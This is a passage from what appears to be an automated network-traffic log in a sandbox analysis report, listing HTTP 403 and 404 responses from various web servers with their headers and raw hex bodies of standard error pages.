2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:52:00 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:52:00 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:00 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.19.10X-Wix-Request-Id: 1696859521.1513167458409120754X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 09 Oct 2023 13:52:01 GMTX-Served-By: cache-bur-kbur8200174-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLgusAIMgWk1Brq+Ibw9VA8kG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:52:16 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6biH1ld1IVPjyons%2BkNXCkJDIhPXYBkOl0YbujiPgIpE5v%2BkQpSwuMHg0UH0w85WNdkOvdroQ9yGAy5HYyKzPZ9hQx8cBx%2BHGYslm58mfr0ef1umYJ%2BP370aXxdhQFTh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a07ea3d2efd-LAXData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv=
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 09 Oct 2023 13:52:02 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:02 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:52:02 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Mon, 09 Oct 2023 13:52:03 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:52:04 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:05 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AN0GYYryt8DBxmgGFiyao%2BmL1xe3qYto%2FG6ES648jnDjFV%2FDUC8kH4HhLB6ygEBAm2yT2E2f0t6Gfbcc0%2FyDCNe87sDBGk1%2B%2Bv5YBTJ6fvFt7%2FDav4L5LK9Spsc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a21c9fb535b-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:52:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: c64ce815-733b-422d-82c5-dc1ed914a13eCF-Cache-Status: DYNAMICReport-To: 